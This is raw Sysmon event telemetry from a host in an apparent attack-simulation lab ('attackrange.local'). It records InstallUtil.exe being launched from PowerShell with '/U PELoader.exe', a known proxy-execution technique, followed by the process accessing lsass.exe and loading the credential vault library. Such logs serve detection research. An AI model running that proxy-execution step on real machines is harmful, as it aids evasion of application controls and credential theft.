17:45:42.547{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\bcacaaa795f281ac827a1af051d3a051\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=DF0A266E1C073131336B9597E2543820,SHA256=F1079A19E1C6E19EB1A2BA701A3919A0A0474EDFA579D8F3EC05965ECDF5F6FDfalse-Unavailable 734700x800000000000000057614309Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.547{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=C928B5301D291782935A1342A01F6125,SHA256=945ACD65BDCE2291C3C2D15FD910F6E331570D516D386C53FDFB5EC38BE69125false-Unavailable 734700x800000000000000057614308Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.531{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=0745D9F1BAC58E47CC87656768304313,SHA256=BBA1936354A9EF269B283FE706A74B73BE39CAF4DD57AB0D1CD06A1C75E260A2trueMicrosoft CorporationValid 734700x800000000000000057614307Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.531{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057614306Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.531{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\474c5d5d840d0a8b1974061ff11f02c2\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=9955B914F307F0142D003E93A3A500BE,SHA256=1247284354586C375597AD8046AAC7F983BAAC74B545B674FB12DB4BAC5C6C01trueMicrosoft CorporationValid 734700x800000000000000057614305Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.531{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 734700x800000000000000057614304Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.531{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 13241300x800000000000000057614303Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:45:42.531{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7ed-0x1d0cc932) 734700x800000000000000057614301Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.531{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=1AF77AF533C702978D4C91C31DB1CCE5,SHA256=39AB2B2B034E3210D866FCF8649EB84C28E3DAB7CB7FA7C986346C6A9ED22D0AtrueMicrosoft CorporationValid 734700x800000000000000057614300Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.531{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057614299Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.531{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057614298Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.531{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057614297Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.531{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057614296Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.531{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057614295Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.531{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057614294Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.531{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057614293Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.531{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057614292Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.531{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057614291Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.531{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057614290Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.531{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057614289Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.516{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 734700x800000000000000057614288Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.516{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057614287Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.516{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057614286Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.516{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057614285Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.516{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057614284Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.516{8B6011A9-A829-618E-48FD-04000000F101}28766048C:\Windows\system32\conhost.exe{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057614283Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.516{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057614282Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.516{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057614281Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.516{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x800000000000000057614280Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.516{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057614279Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.516{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71trueMicrosoft CorporationValid 10341000x800000000000000057614278Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.516{8B6011A9-888A-6164-7000-00000000F101}34483736C:\Windows\system32\csrss.exe{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057614277Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.516{8B6011A9-A828-618E-47FD-04000000F101}3756712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4ce006b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41634c4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41630ff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4c2b42d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4120071(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4183ae3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4165af2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4165af2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4165983(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41566a3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4163be5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4163757(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41634c4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41630ff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4c2b42d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+41483aa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+414791c(wow64) 154100x800000000000000057614276Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:42.521{8B6011A9-A846-618E-4FFD-04000000F101}5760C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe" /logfile= /LogToConsole=false /U PELoader.exeC:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{8B6011A9-8897-6164-CBF3-050000000000}0x5f3cb2HighMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71{8B6011A9-A828-618E-47FD-04000000F101}3756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 734700x800000000000000057614481Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.766{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\vaultcli.dll10.0.14393.4169 (rs1_release.210107-1130)Credential Vault Client LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationvaultcli.dllMD5=3A4413FEB384CA47420B1A7CB9099BF0,SHA256=338D718FF68D1ACF8AFC366E923B44128E821DDD50A9C282A5F55502BAF288FAtrueMicrosoft WindowsValid 734700x800000000000000057614466Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.766{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\WinTypes.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Base Types DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWinTypes.dllMD5=9F209F29ABFF007F55328BCC36367005,SHA256=7F2CBE9B349062DFD782032D50C335E6C292EC5F509746941982A7161F24ED84trueMicrosoft WindowsValid 10341000x800000000000000057614464Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.766{8B6011A9-886B-6164-0B00-00000000F101}6486664C:\Windows\system32\lsass.exe{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057614463Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.766{8B6011A9-886B-6164-0B00-00000000F101}6486664C:\Windows\system32\lsass.exe{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057614462Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.766{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntasn1.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft ASN.1 APIMicrosoft® Windows® Operating SystemMicrosoft Corporationntasn1.dllMD5=A45B23E8D2623CE3F760377766AF3E24,SHA256=E0A8F5055CD9E2AF029B8537E09EFFAF1F46C724CB720A6395DCF563EF70B843trueMicrosoft WindowsValid 734700x800000000000000057614461Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.766{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ncrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows NCrypt RouterMicrosoft® Windows® Operating SystemMicrosoft Corporationncrypt.dllMD5=025DBE9D0F7AE719C64DE3A4555A7C0A,SHA256=1A223828A444E7797A9E00632DAE81AC3AC68B38786E67912B1C3FC6118FB6B4trueMicrosoft WindowsValid 734700x800000000000000057614460Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:45:57.703{8B6011A9-A855-618E-50FD-04000000F101}9264C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\secur32.dll10.0.14393.2273 